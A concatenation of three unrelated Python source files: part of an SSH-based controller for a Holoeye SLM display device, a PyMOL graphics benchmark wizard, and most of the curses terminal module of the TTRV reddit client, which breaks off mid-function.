def _show_image(self):
self.channel.send(self.Commands.SHOW_IMAGE+'\n')
# while not self.channel.recv_ready():
# pass
# out = self.channel.recv(9999)
# print(out.decode())
'''
Validates the array whether it is a legitimate input.
'''
def _validateArray(self, array):
if (array.shape == (self.height, self.width)) and (array.max() <= self.max) and (array.min() >= self.min):
return array
raise Exception(self.invalid_array_err)
'''
Validates the input image path whether it is a legitimate input. And returns the array in case it's a correct format
'''
def _validateImage(self, path):
im = imageio.imread(path)
return self._validateArray(im)
'''Saves the image in the temporary path'''
def _saveImage(self, array):
try:
imageio.imwrite(self.CACHE_PATH+'/tmp.bmp', array)
except Exception as ex:
print(ex)
'''Removes the image in the temporary path'''
def _removeImage(self):
try:
if os.path.exists(self.CACHE_PATH+'/tmp.bmp'):
os.remove(self.CACHE_PATH+'/tmp.bmp')
except Exception as ex:
print(ex)
'''
Establishes connection to the Holoeyes SLM device
'''
def connect(self):
return super().connect(self.hostname, port=self.port, username=self.username, password=self.password)
'''
Disconnects the HDMI output of the Holoeye SLM device
'''
def diconnectHDMI(self):
self.channel.send(self.Commands.DISABLE_HDMI+'\n')
# while not self.channel.recv_ready():
# pass
# out = self.channel.recv(9999)
# print(out.decode())
'''
Sends an image at a given path to HoloeyeSLM
'''
def sendImage(self, FILE_PATH):
try:
array = self._validateImage(FILE_PATH)
self._saveImage(array)
# TODO : SEND IMAGE TO HOME DIRECTORY
with SCPClient(self.get_transport()) as scp:
scp.put(self.CACHE_PATH+'/tmp.bmp',remote_path='~')
scp.close()
self._show_image()
# TODO : RUN SHOW COMMAND ON
# self._removeImage()
except Exception as ex:
raise ex
'''
Sends an nparray to HoloeyeSLM
'''
def sendData(self, data):
try:
array = self._validateArray(data)
self._saveImage(array)
# TODO : SEND IMAGE TO HOME DIRECTORY
with SCPClient(self.get_transport()) as scp:
scp.put(self.CACHE_PATH+'/tmp.bmp',remote_path='~')
scp.close()
self._show_image()
# TODO : RUN SHOW COMMAND ON
self._removeImage()
except Exception as ex:
raise ex
'''
Changes the current HoloeyeSLM IP address
'''
def changeIP(self, new_IP='10.10.70.2',mask='255.0.0.0'):
print(self.Commands.CHANGE_IP.format(new_IP,mask)+'\n')
self.channel.send(self.Commands.CHANGE_IP.format(new_IP,mask)+'\n')
self.hostname = new_IP
self.close()
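# Illustrative usage sketch (assumptions: the SLM is reachable at the default
# 10.10.70.1 address with the default root/empty-password credentials, and the
# panel uses the default 1920x1080 geometry with a 0-255 pixel range; the
# gradient below is purely hypothetical test data).
if __name__ == "__main__":
    # Full-frame horizontal gradient matching the default panel geometry.
    gradient = np.tile(np.linspace(0, 255, 1920, dtype=np.uint8), (1080, 1))
    slm = HoloeyeSLM()
    try:
        # Validates the array, writes ./cache/tmp.bmp, copies it over SCP and
        # runs the display command on the device.
        slm.sendData(gradient)
    finally:
        slm.close()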
|
benchmark.py
|
from __future__ import print_function
import threading
from pymol.wizard import Wizard
from pymol import cmd
import pymol
import types
import time
class Benchmark(Wizard):
def bench_fn(self,action):
time.sleep(0.5)
self.cmd.do("_ wizard benchmark,%s"%action)
def report(self,name,value):
ver = self.cmd.get_version()[0]
print("PyMOL %s benchmark: %30s = %10.5f"%(ver,name,value))
def launch(self,name):
return None
def configure(self):
self.cmd.reinitialize()
def __init__(self,arg0=None,_self=cmd):
Wizard.__init__(self,_self)
self.gl = 5.0
self.short_cpu = 8.0
self.long_cpu = 16.0
self.message = []
if arg0!=None:
if hasattr(self,arg0):
getattr(self,arg0)()
def reset(self):
pass
def run_all(self):
self.run_gl()
self.run_cpu()
def run_cpu(self):
self.surface_calculation()
self.configure()
self.mesh_calculation()
self.configure()
self.ray_trace1()
self.configure()
def run_gl(self):
self.configure()
self.updates()
self.configure()
self.smooth_lines()
self.configure()
self.jagged_lines()
self.configure()
self.dots()
self.configure()
self.sticks()
self.configure()
self.surface()
self.configure()
self.spheres()
self.configure()
self.cartoon()
self.configure()
self.blits()
self.configure()
def updates(self):
self.cmd.fragment("methane")
self.cmd.set("antialias",0)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",1)
self.cmd.turn("y",1)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('UPDATES_V1',(cnt/elapsed)/100)
def smooth_lines(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.show("mesh")
self.cmd.zoom(complete=1)
elapsed = 0.0
cnt = 0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('SMOOTH_LINES_V1',cnt/elapsed)
def jagged_lines(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.show("mesh")
self.cmd.set("line_smooth",0)
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('JAGGED_LINES_V1',cnt/elapsed)
def dots(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("dots")
self.cmd.zoom(complete=1)
elapsed = 0.0
cnt = 0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('DOTS_V1',cnt/elapsed)
def sticks(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("sticks")
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('STICKS_V1',cnt/elapsed)
def surface(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("surface")
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('SURFACE_V1',cnt/elapsed)
def spheres(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("spheres")
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('SPHERES_V1',cnt/elapsed)
def cartoon(self):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.hide()
self.cmd.show("cartoon")
self.cmd.spectrum("count",selection="name ca")
self.cmd.zoom(complete=1)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.turn("x",15)
self.cmd.turn("y",15)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('CARTOON_V1',cnt/elapsed)
def blits(self):
self.cmd.load("$PYMOL_DATA/demo/pept.pdb")
self.cmd.mset("1 x2")
self.cmd.set('cache_frames',1)
self.cmd.rewind()
self.cmd.refresh()
self.cmd.turn('x',5)
self.cmd.forward()
self.cmd.refresh()
cnt = 0
elapsed = 0.0
self.cmd.refresh()
self.cmd.meter_reset()
start = time.time()
while elapsed<self.gl:
self.cmd.frame(1)
self.cmd.refresh()
self.cmd.frame(2)
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('BLITS_V1',2*cnt/elapsed)
def surface_calculation(self):
self.cmd.load("$PYMOL_DATA/demo/il2.pdb")
self.cmd.zoom(complete=1)
self.cmd.hide()
self.cmd.show("surface")
self.cmd.clip("slab",0)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
start = time.time()
while (elapsed)<self.short_cpu:
self.cmd.rebuild()
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('SURFACE_CALCULATION_V1',60*cnt/elapsed)
def mesh_calculation(self):
self.cmd.load("$PYMOL_DATA/demo/il2.pdb")
self.cmd.zoom(complete=1)
self.cmd.hide()
self.cmd.show("mesh")
self.cmd.clip("slab",0)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
start = time.time()
while (elapsed)<self.short_cpu:
self.cmd.rebuild()
self.cmd.refresh()
cnt = cnt + 1
elapsed = time.time()-start
self.report('MESH_CALCULATION_V1',60*cnt/elapsed)
def ray_trace0(self): # Interactive benchmark
self.configure()
self.ray_tracing([
[2,90],
])
def ray_trace1(self): # Standard benchmark
self.configure()
self.ray_tracing([
[1,90],
[2,90],
[4,90],
[8,90],
[1,120],
[2,120],
[1,160],
[2,160],
[1,200],
[2,200],
])
def ray_trace2(self): # Heavy-duty SMP workout
self.configure()
self.ray_tracing([
[1,200],
[2,200],
[3,200],
[4,200],
[5,200],
[6,200],
[7,200],
[8,200],
[9,200],
[10,200],
[11,200],
[12,200],
],width=3600,height=2700)
def ray_tracing(self,conditions,width=640,height=480):
self.cmd.load("$PYMOL_DATA/demo/1tii.pdb")
self.cmd.zoom(complete=1)
self.cmd.hide()
self.cmd.show("spheres","11-15/")
self.cmd.show("surface","21-25/")
self.cmd.show("mesh","A/10-20/")
self.cmd.show("sticks","41-50/")
self.cmd.show("lines","51-55/")
self.cmd.show("dots","61-65/")
self.cmd.show("cartoon","80-90/")
self.cmd.turn('x',25)
self.cmd.turn('y',25)
for cond in conditions:
(max_threads,hash_max) = cond
self.cmd.set('max_threads',max_threads)
self.cmd.set('hash_max',hash_max)
cnt = 0
elapsed = 0.0
self.cmd.refresh()
start = time.time()
while elapsed<self.long_cpu:
self.cmd.ray(width,height,quiet=1)
cnt = cnt + 1
elapsed = time.time()-start
self.report('RAY_V2_PX%d_TH%02d_HSH%03d'%(width*height,
max_threads,hash_max),60*cnt/elapsed)
def get_prompt(self):
self.prompt = self.message
return self.prompt
def delay_launch(self,action):
self.configure()
self.cmd.viewport(640,480)
self.cmd.feedback("disable","all","everything")
self.cmd.feedback("enable","python","output")
t = threading.Thread(target=self.bench_fn,args=(action,))
t.setDaemon(1)
t.start()
def get_panel(self):
return [
[ 1, 'Benchmarks', '' ],
[ 2, 'Run All', 'cmd.get_wizard().delay_launch("run_all")' ],
[ 2, 'Run GL', 'cmd.get_wizard().delay_launch("run_gl")' ],
[ 2, 'Run CPU', 'cmd.get_wizard().delay_launch("run_cpu")' ],
[ 2, 'Updates', 'cmd.get_wizard().delay_launch("updates")'],
[ 2, 'Smooth Lines', 'cmd.get_wizard().delay_launch("smooth_lines")'],
[ 2, 'Jagged Lines', 'cmd.get_wizard().delay_launch("jagged_lines")'],
[ 2, 'Dots', 'cmd.get_wizard().delay_launch("dots")'],
[ 2, 'Sticks', 'cmd.get_wizard().delay_launch("sticks")'],
[ 2, 'Surface', 'cmd.get_wizard().delay_launch("surface")'],
[ 2, 'Spheres', 'cmd.get_wizard().delay_launch("spheres")'],
[ 2, 'Cartoon', 'cmd.get_wizard().delay_launch("cartoon")'],
[ 2, 'Blits', 'cmd.get_wizard().delay_launch("blits")'],
[ 2, 'Surface Calculation', 'cmd.get_wizard().delay_launch("surface_calculation")'],
[ 2, 'Mesh Calculation', 'cmd.get_wizard().delay_launch("mesh_calculation")'],
[ 2, 'Ray Tracing', 'cmd.get_wizard().delay_launch("ray_trace0")'],
[ 2, 'End Demonstration', 'cmd.set_wizard()' ]
]
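# Illustrative sketch (mirroring bench_fn/delay_launch above): inside a PyMOL
# session the wizard is driven from the command line, e.g.:
#
#     wizard benchmark              # open the benchmark panel
#     wizard benchmark, run_gl      # run only the OpenGL benchmarks
#     wizard benchmark, run_cpu     # run only the CPU benchmarks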
|
terminal.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import re
import sys
import time
import shlex
import codecs
import curses
import logging
import threading
import webbrowser
import subprocess
import curses.ascii
from curses import textpad
from multiprocessing import Process
from contextlib import contextmanager
from tempfile import NamedTemporaryFile
import six
from kitchen.text.display import textual_width_chop
from . import exceptions, mime_parsers, content
from .docs import TOKEN
from .theme import Theme, ThemeList
from .objects import LoadScreen
try:
# Fix only needed for versions prior to python 3.6
from mailcap_fix import mailcap
except ImportError:
import mailcap
try:
# Added in python 3.4+
from html import unescape
except ImportError:
from six.moves import html_parser
unescape = html_parser.HTMLParser().unescape
if sys.version_info[0:2] == (3, 8) and sys.platform == 'darwin':
from multiprocessing import set_start_method
set_start_method('fork')
_logger = logging.getLogger(__name__)
class Terminal(object):
MIN_HEIGHT = 10
MIN_WIDTH = 20
# ASCII codes
ESCAPE = 27
RETURN = 10
SPACE = 32
def __init__(self, stdscr, config):
self.stdscr = stdscr
self.config = config
self.loader = LoadScreen(self)
self.theme = None # Initialized by term.set_theme()
self.theme_list = ThemeList()
self._display = None
self._mailcap_dict = mailcap.getcaps()
self._term = os.environ.get('TERM')
# This is a hack, the MIME parsers should be stateless
# but we need to load the imgur credentials from the config
mime_parsers.ImgurApiMIMEParser.CLIENT_ID = config['imgur_client_id']
@property
def up_arrow(self):
return '^' if self.config['ascii'] else '▲'
@property
def down_arrow(self):
return 'v' if self.config['ascii'] else '▼'
@property
def neutral_arrow(self):
return 'o' if self.config['ascii'] else '•'
@property
def gilded(self):
return '*' if self.config['ascii'] else '✪'
@property
def vline(self):
return getattr(curses, 'ACS_VLINE', ord('|'))
@property
def display(self):
"""
Use a number of methods to guess if the default webbrowser will open in
the background as opposed to opening directly in the terminal.
"""
if self._display is None:
if sys.platform == 'darwin':
# OS X won't set $DISPLAY unless xQuartz is installed.
# If you're using OS X and you want to access a terminal
# browser, you need to set it manually via $BROWSER.
# See issue #166
display = True
else:
display = bool(os.environ.get("DISPLAY"))
# Use the convention defined here to parse $BROWSER
# https://docs.python.org/2/library/webbrowser.html
console_browsers = ['www-browser', 'links', 'links2', 'elinks',
'lynx', 'w3m']
if "BROWSER" in os.environ:
user_browser = os.environ["BROWSER"].split(os.pathsep)[0]
if user_browser in console_browsers:
display = False
if webbrowser._tryorder:
if webbrowser._tryorder[0] in console_browsers:
display = False
self._display = display
return self._display
def flash(self):
"""
Flash the screen to indicate that an action was invalid.
"""
if self.config['flash']:
return curses.flash()
else:
return None
@staticmethod
def curs_set(val):
"""
Change the cursor visibility, may fail for some terminals with limited
cursor support.
"""
try:
curses.curs_set(val)
except:
pass
@staticmethod
def addch(window, y, x, ch, attr):
"""
Curses addch() method that fixes a major bug in python 3.4.
See http://bugs.python.org/issue21088
"""
if sys.version_info[:3] == (3, 4, 0):
y, x = x, y
window.addch(y, x, ch, attr)
def getch(self):
"""
Wait for a keypress and return the corresponding character code (int).
"""
return self.stdscr.getch()
@staticmethod
@contextmanager
def suspend():
"""
Suspend curses in order to open another subprocess in the terminal.
"""
try:
curses.endwin()
yield
finally:
curses.doupdate()
@contextmanager
def no_delay(self):
"""
Temporarily turn off character delay mode. In this mode, getch will not
block while waiting for input and will return -1 if no key has been
pressed.
"""
try:
self.stdscr.nodelay(1)
yield
finally:
self.stdscr.nodelay(0)
def get_arrow(self, likes):
"""
Curses does define constants for symbols (e.g. curses.ACS_BULLET).
However, they rely on using the curses.addch() function, which has been
found to be buggy and a general PITA to work with. By defining them as
unicode points they can be added via the more reliable curses.addstr().
http://bugs.python.org/issue21088
"""
if likes is None:
return self.neutral_arrow, self.attr('NeutralVote')
elif likes:
return self.up_arrow, self.attr('Upvote')
else:
return self.down_arrow, self.attr('Downvote')
def clean(self, string, n_cols=None):
"""
Required reading!
http://nedbatchelder.com/text/unipain.html
Python 2 input string will be a unicode type (unicode code points).
Curses will accept unicode if all of the points are in the ascii range.
However, if any of the code points are not valid ascii curses will
throw a UnicodeEncodeError: 'ascii' codec can't encode character,
ordinal not in range(128). If we encode the unicode to a utf-8 byte
string and pass that to curses, it will render correctly.
Python 3 input string will be a string type (unicode code points).
Curses will accept that in all cases. However, the n character count in
addnstr will not be correct. If code points are passed to addnstr,
curses will treat each code point as one character and will not account
for wide characters. If utf-8 is passed in, addnstr will treat each
'byte' as a single character.
Reddit's api sometimes chokes and double-encodes some html characters
Praw handles the initial decoding, but we need to do a second pass
just to make sure. See https://github.com/tildeclub/ttrv/issues/96
Example:
&amp;amp; -> returned directly from reddit's api
&amp; -> returned after PRAW decodes the html characters
& -> returned after our second pass, this is the true value
"""
if n_cols is not None and n_cols <= 0:
return ''
if isinstance(string, six.text_type):
string = unescape(string)
if self.config['ascii']:
if isinstance(string, six.binary_type):
string = string.decode('utf-8')
string = string.encode('ascii', 'replace')
return string[:n_cols] if n_cols else string
else:
if n_cols:
string = textual_width_chop(string, n_cols)
if isinstance(string, six.text_type):
string = string.encode('utf-8')
return string
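# Illustrative sketch (assumed setup: term is a Terminal instance with
# config['ascii'] enabled): clean() applies the second unescape pass and then
# forces the text down to an ascii byte string, e.g.:
#
#     term.clean('&amp;')       # -> b'&'          (second unescape pass)
#     term.clean('✪ gilded')    # -> b'? gilded'   (non-ascii replaced)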
def add_line(self, window, text, row=None, col=None, attr=None):
"""
Unicode aware version of curses's built-in addnstr method.
Safely draws a line of text on the window starting at position
(row, col). Checks the boundaries of the window and cuts off the text
if it exceeds the length of the window.
"""
# The following arg combos must be supported to conform with addnstr
# (window, text)
# (window, text, attr)
# (window, text, row, col)
# (window, text, row, col, attr)
cursor_row, cursor_col = window.getyx()
row = row if row is not None else cursor_row
col = col if col is not None else cursor_col
max_rows, max_cols = window.getmaxyx()
n_cols = max_cols - col - 1
if n_cols <= 0:
# Trying to draw outside of the screen bounds
return
try:
text = self.clean(text, n_cols)
params = [] if attr is None else [attr]
window.addstr(row, col, text, *params)
except (curses.error, ValueError, TypeError) as e:
# Curses handling of strings with invalid null bytes (b'\00')
# python 2: TypeError: "int,int,str"
# python 3: ValueError: "embedded null byte"
_logger.warning('add_line raised an exception')
_logger.exception(str(e))
@staticmethod
def add_space(window):
"""
Shortcut for adding a single space to a window at the current position
"""
row, col = window.getyx()
_, max_cols = window.getmaxyx()
n_cols = max_cols - col - 1
if n_cols <= 0:
# Trying to draw outside of the screen bounds
return
window.addstr(row, col, ' ')
def show_notification(self, message, timeout=None, style='Info'):
"""
Overlay a message box on the center of the screen and wait for input.
Params:
message (list or string): List of strings, one per line.
timeout (float): Optional, maximum length of time that the message
will be shown before disappearing.
style (str): The theme element that will be applied to the
notification window
"""
assert style in ('Info', 'Warning', 'Error', 'Success')
if isinstance(message, six.string_types):
message = message.splitlines()
n_rows, n_cols = self.stdscr.getmaxyx()
v_offset, h_offset = self.stdscr.getbegyx()
box_width = max(len(m) for m in message) + 2
box_height = len(message) + 2
# Cut off the lines of the message that don't fit on the screen
box_width = min(box_width, n_cols)
box_height = min(box_height, n_rows)
message = message[:box_height - 2]
s_row = (n_rows - box_height) // 2 + v_offset
s_col = (n_cols - box_width) // 2 + h_offset
window = curses.newwin(box_height, box_width, s_row, s_col)
window.bkgd(str(' '), self.attr('Notice{0}'.format(style)))
window.erase()
window.border()
for index, line in enumerate(message, start=1):
self.add_line(window, line, index, 1)
window.refresh()
ch, start = -1, time.time()
with self.no_delay():
while timeout is None or time.time() - start < timeout:
ch = self.getch()
if ch != -1:
break
time.sleep(0.01)
window.clear()
del window
self.stdscr.touchwin()
self.stdscr.refresh()
return ch
def prompt_user_to_select_link(self, links):
"""
Prompt the user to select a link from a list to open.
Return the link that was selected, or ``None`` if no link was selected.
"""
link_pages = self.get_link_pages(links)
n = 0
while n in range(len(link_pages)):
link_page = link_pages[n]
text = 'Select a link to open (page {} of {}):\n\n'
text = text.format(n+1, len(link_pages))
text += self.get_link_page_text(link_page)
if link_page is not link_pages[-1]:
text += '[j] next page...'
if link_page is not link_pages[0]:
if link_page is not link_pages[-1]:
text += '\n'
text += '[k] ...previous page'
try:
choice = chr(self.show_notification(text))
try:
choice = int(choice)
except ValueError:
pass
except ValueError:
return None
if choice == 'j':
if link_page is not link_pages[-1]:
n += 1
continue
elif choice == 'k':
if link_page is not link_pages[0]:
n -= 1
continue
elif choice not in range(len(link_page)):
return None
return link_page[choice]['href']
@staticmethod
def get_link_pages(links):
"""
Given a list of links, separate them into pages that can be displayed
to the user and navigated using the 1-9 and 0 number keys.
"""
link_pages = []
i = 0
while i < len(links):
link_page = []
while i < len(links) and len(link_page) < 10:
link_page.append(links[i])
i += 1
link_pages.append(link_page)
return link_pages
@staticmethod
def get_link_page_text(link_page):
"""
Construct the dialog box to display a list of links to the user.
"""
text = ''
for i, link in enumerate(link_page):
capped_link_text = (link['text'] if len(link['text']) <= 20
else link['text'][:19] + '…')
text += '[{}] [{}]({})\n'.format(i, capped_link_text, link['href'])
return text
def open_link(self, url):
"""
Open a media link using the definitions from the user's mailcap file.
Most urls are parsed using their file extension, but special cases
exist for websites that are prevalent on reddit such as Imgur and
Gfycat. If there are no valid mailcap definitions, TTRV will fall back
to using the default webbrowser.
TTRV checks for certain mailcap fields to determine how to open a link:
- If ``copiousoutput`` is specified, the curses application will
be paused and stdout will be piped to the system pager.
- If ``needsterminal`` is specified, the curses application will
yield terminal control to the subprocess until it has exited.
- Otherwise, we assume that the subprocess is meant to open a new
x-window, and we swallow all stdout output.
Examples:
Stream youtube videos with VLC
Browse images and imgur albums with feh
Watch .webm videos through your terminal with mplayer
View images directly in your terminal with fbi or w3m
Play .mp3 files with sox player
Send HTML pages to your pager using html2text
...anything is possible!
"""
if not self.config['enable_media']:
self.open_browser(url)
return
try:
with self.loader('Checking link', catch_exception=False):
command, entry = self.get_mailcap_entry(url)
except exceptions.MailcapEntryNotFound:
self.open_browser(url)
return
_logger.info('Executing command: %s', command)
needs_terminal = 'needsterminal' in entry
copious_output = 'copiousoutput' in entry
if needs_terminal or copious_output:
# Blocking, pause ttrv until the process returns
with self.suspend():
os.system('clear')
p = subprocess.Popen(
[command], stderr=subprocess.PIPE,
universal_newlines=True, shell=True)
_, stderr = p.communicate()
if copious_output:
six.moves.input('Press any key to continue')
code = p.poll()
if code != 0:
_logger.warning(stderr)
self.show_notification(
'Program exited with status={0}\n{1}'.format(
code, stderr.strip()), style='Error')
else:
# Non-blocking, open a background process
with self.loader('Opening page', delay=0):
p = subprocess.Popen(
[command], shell=True, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Wait a little while to make sure that the command doesn't
# exit with an error. This isn't perfect, but it should be good
# enough to catch invalid commands.
time.sleep(1.0)
code = p.poll()
if code is not None and code != 0:
_, stderr = p.communicate()
raise exceptions.BrowserError(
'Program exited with status={0}\n{1}'.format(
code, stderr.strip()))
# Spin off a thread with p.communicate() to avoid subprocess
# hang when the stdout/stderr PIPE gets filled up. This
# behavior was discovered when opening long gifs with mpv
# because mpv sends a progress bar to stderr.
# https://thraxil.org/users/anders/posts/2008/03/13/
threading.Thread(target=p.communicate).start()
def get_mailcap_entry(self, url):
"""
Search through the mime handlers list and attempt to find the
appropriate command to open the provided url with.
Will raise a MailcapEntryNotFound exception if no valid command exists.
Params:
url (text): URL that will be checked
Returns:
command (text): The string of the command that should be executed
in a subprocess to open the resource.
entry (dict): The full mailcap entry for the corresponding command
"""
for parser in mime_parsers.parsers:
if parser.pattern.match(url):
# modified_url may be the same as the original url, but it
# could also be updated to point to a different page, or it
# could refer to the location of a temporary file with the
# page's downloaded content.
try:
modified_url, content_type = parser.get_mimetype(url)
except Exception as e:
# If Imgur decides to change its html layout, let it fail
# silently in the background instead of crashing.
_logger.warning('parser %s raised an exception', parser)
_logger.exception(e)
raise exceptions.MailcapEntryNotFound()
if not content_type:
_logger.info('Content type could not be determined')
raise exceptions.MailcapEntryNotFound()
elif content_type == 'text/html':
_logger.info('Content type text/html, deferring to browser')
raise exceptions.MailcapEntryNotFound()
command, entry = mailcap.findmatch(
self._mailcap_dict, content_type, filename=modified_url)
if not entry:
_logger.info('Could not find a valid mailcap entry')
raise exceptions.MailcapEntryNotFound()
return command, entry
# No parsers matched the url
raise exceptions.MailcapEntryNotFound()
def open_browser(self, url):
"""
Open the given url using the default webbrowser. The preferred browser
can be specified with the $BROWSER environment variable. If not specified,
python webbrowser will try to determine the default to use based on
your system.
For browsers requiring an X display, we open a new subprocess and
redirect stdout/stderr to devnull. This is a workaround to stop
BackgroundBrowsers (e.g. xdg-open, any BROWSER command ending in "&"),
from spewing warning messages to the console. See
http://bugs.python.org/issue22277 for a better description of the
problem.
For console browsers (e.g. w3m), TTRV will suspend and display the
browser window within the same terminal. This mode is triggered either
when
1. $BROWSER is set to a known console browser, or
2. $DISPLAY is undefined, indicating that the terminal is running
headless
There may be other cases where console browsers are opened (xdg-open?)
but are not detected here. These cases are still unhandled and will
probably be broken if we incorrectly assume that self.display=True.
"""
if self.display:
with self.loader('Opening page in a new window'):
def open_url_silent(url):
# This used to be done using subprocess.Popen().
# It was switched to multiprocessing.Process so that we
# can re-use the webbrowser instance that has been patched
# by TTRV. It's also safer because it doesn't inject
# python code through the command line.
# Suppress stdout/stderr from the browser, see
# https://stackoverflow.com/questions/2323080. We can't
# depend on replacing sys.stdout & sys.stderr because
# webbrowser uses Popen().
stdout, stderr = os.dup(1), os.dup(2)
null = os.open(os.devnull, os.O_RDWR)
try:
os.dup2(null, 1)
os.dup2(null, 2)
if self.config['force_new_browser_window']:
webbrowser.open_new(url)
else:
webbrowser.open_new_tab(url)
finally:
try:
os.close(null)
except OSError:
pass
os.dup2(stdout, 1)
os.dup2(stderr, 2)
p = Process(target=open_url_silent, args=(url,))
p.start()
# Give the browser 7 seconds to open a new tab. Because the
# display is set, calling webbrowser should be non-blocking.
# If it blocks or returns an error, something went wrong.
try:
p.join(7)
if p.is_alive():
raise exceptions.BrowserError(
'Timeout waiting for browser to open')
finally:
# This will be hit on the browser timeout, but also if the
# user presses the ESC key. We always want to kill the
# webbrowser process if it hasn't opened the tab and
# terminated by now.
try:
p.terminate()
except OSError:
pass
else:
with self.suspend():
if self.config['force_new_browser_window']:
webbrowser.open_new(url)
else:
webbrowser.open_new_tab(url)
def open_pager(self, data, wrap=None):
"""
View a long block of text using an external pager / viewer. The setting
of the TTRV_PAGER variable will be used if set, otherwise the system's
default pager is chosen, finally defaulting to 'less' if both TTRV_PAGER
and PAGER are unset in the calling environment.
The data string will be piped directly to the pager.
"""
pager = os.getenv('TTRV_PAGER')
if pager is None:
pager = os.getenv('PAGER') or 'less'
command = shlex.split(pager)
if wrap:
data_lines = content.Content.wrap_text(data, wrap)
data = '\n'.join(data_lines)
try:
with self.suspend():
_logger.debug('Running command: %s', command)
p = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
p.communicate(data.encode('utf-8'))
except KeyboardInterrupt:
p.terminate()
except OSError as e:
_logger.exception(e)
self.show_notification('Could not open pager %s' % pager)
@contextmanager
def open_editor(self, data=''):
"""
Open a file for editing using the system's default editor.
After the file has been altered, the text will be read back and the
HTML comment tag <!--INSTRUCTIONS --> will be stripped. If an error
occurs inside of the context manager, the file will be preserved so
users can recover their data. Otherwise, the file will be deleted when
the context manager closes.
Params:
data (str): If provided, text will be written to the file before
opening it with the editor.
Returns:
text (str): The text that the user entered into the editor.
"""
with NamedTemporaryFile(prefix='ttrv_', suffix='.txt', delete=False) as fp:
# Create a temporary file and grab the name, but close immediately so
# we can re-open using the right encoding
filepath = fp.name
with codecs.open(filepath, 'w', 'utf-8') as fp:
fp.write(data)
_logger.info('File created: %s', filepath)
editor = (os.getenv('TTRV_EDITOR') or
os.getenv('VISUAL') or
os.getenv('EDITOR') or
'nano')
command = shlex.split(editor) + [filepath]
try:
with self.suspend():
_logger.debug('Running command: %s', command)
p = subprocess.Popen(command)
try:
p.communicate()
except KeyboardInterrupt:
p.terminate()
except OSError as e:
_logger.exception(e)
self.show_notification('Could not open file with %s' % editor)
with codecs.open(filepath, 'r', 'utf-8') as fp:
text = fp.read()
text = self.strip_instructions(text)
try:
yield text
except exceptions.TemporaryFileError:
# All exceptions will cause the file to *not* be removed, but these
# ones should also be swallowed
_logger.info('Caught TemporaryFileError')
self.show_notification('Post saved as: %s' % filepath)
else:
# If no errors occurred, try to remove the file
try:
os.remove(filepath)
except OSError:
_logger.warning('Could not delete: %s', filepath)
else:
_logger.info('File deleted: %s', filepath)
def open_urlview(self, data):
"""
Pipe a block of text to urlview, which displays a list of urls
contained in the text and allows the user to open them with their
web browser.
"""
urlview = os.getenv('TTRV_URLVIEWER') or 'urlview'
command = shlex.split(urlview)
try:
with self.suspend():
_logger.debug('Running command: %s', command)
p = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
p.communicate(input=data.encode('utf-8'))
except KeyboardInterrupt:
p.terminate()
code = p.poll()
if code == 1:
# Clear the "No URLs found." message from stdout
sys.stdout.write("\033[F")
sys.stdout.flush()
if code == 1:
self.show_notification('No URLs found')
except OSError as e:
_logger.exception(e)
self.show_notification(
'Failed to open {0}'.format(urlview))
def text_input(self, window, allow_resize=False):
"""
Transform a window into a text box that will accept user input and loop
until an escape sequence is entered.
If the escape key (27) is pressed, cancel the textbox and return None.
Otherwise, the textbox will wait until it is full (^j, or a new line is
entered on the bottom line) or the BEL key (^g) is pressed.
"""
window.clear()
# Set cursor mode to 1 because 2 doesn't display on some terminals
self.curs_set(1)
# Keep insert_mode off to avoid the recursion error described here
# http://bugs.python.org/issue13051
textbox = textpad.Textbox(window)
textbox.stripspaces = 0
def validate(ch):
"Filters characters for special key sequences"
